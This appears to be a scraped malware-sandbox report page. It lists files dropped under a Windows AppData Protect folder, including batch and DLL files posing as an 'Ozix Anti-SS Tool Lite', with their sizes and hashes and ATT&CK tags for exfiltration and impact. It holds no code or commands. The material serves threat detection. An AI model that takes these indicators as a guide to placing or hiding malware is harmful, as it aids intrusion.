T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.bat

Filesize
174B

MD5
6ef23a73bb6f911d522ea5fb934cb4b3

SHA1
e59665f75c29d41090bf604f5b2dd387400b4436

SHA256
62000a9ca00d44d4602306c795081f6ccf2c15724911874b51d16949c6759614

SHA512
8d4eabced6f579e53410f08aa50407fe6a980b6d66a7e2e0f3b8509aa780ef50654b67623dc0dba865ebc0f22b764f8043c89a62cb4c7c1f071f462c406764ab

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.dll

Filesize
296B

MD5
141d051bfa65caae138c60e613691bcc

SHA1
f6986986d303669b3b1d09317101b67fe33da8bc

SHA256
f98f27dd854a8806013c88248b51fe66efbf19112cde22dac3c21ac820e6bac9

SHA512
b76c8896faed2dd42fa617e41533acefbec483a17b80005982d5c92b15aeada46536572b223e508b298480aa90943f3e9a29b575596d5ce7a34e7780121e2afe

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\Ozix Anti-SS Tool Lite.bat

Filesize
55KB

MD5
1a15abb19c71bce1a26d149101e8baf0

SHA1
353c44e42ebce39a0efefa1bb392473b60ba8e53

SHA256
271d6c6a4e300c442296c4d48d1d94da9d426d53979ef28509f914aafae2d2b7

SHA512
a2a921b454317aec8ed6dd6e78c36b6887da6ffe675f146df4ef0dfcb16e7bb0b90b9cc59f8fb00f7463be94745e8566829b1c23a19b1027deb7058d888cf978

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\Ozix Anti-SS Tool Lite.dll

Filesize
76KB

MD5
58f8317cb130ad549383b121c39a5905

SHA1
e761de80b0e944bd168bc7e74f9df6cce8fa1fac

SHA256
4f4189cfb69c45b7e919222cc0e8de5b81cd49a0a1ee882c165a1ca467d00462

SHA512
1cba75eaadf87869af340ac37b369794f1ab90332fcb00a5949fbc06e45f75ec1ef3b0a513ddedb1f47f828a9635e22f817f986632f7b3222e9f16115592de05

Download Submit
C:\Windows\SysWOW64\ You are logged in

Filesize
3B

MD5
df66fa563a2fafdb93cc559deb0a38c4

SHA1
e6666cf8574b0f7a9ae5bccee572f965c2aec9cb

SHA256
3e39ed22dc63246937c4dbbf34ce4fb1cfe6b00de7596b020cad49ae50031351

SHA512
34ea05ee75cd840a94526411777868edb293a69867e1fdc2c2e917d278a3d58fcb86afc65142f4b184ce6907f04fb254a86061cfb620f01874b0b454a6f01c18

Download Submit
memory/1908-33-0x0000000000400000-0x00000000004F5000-memory.dmp

Filesize
980KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads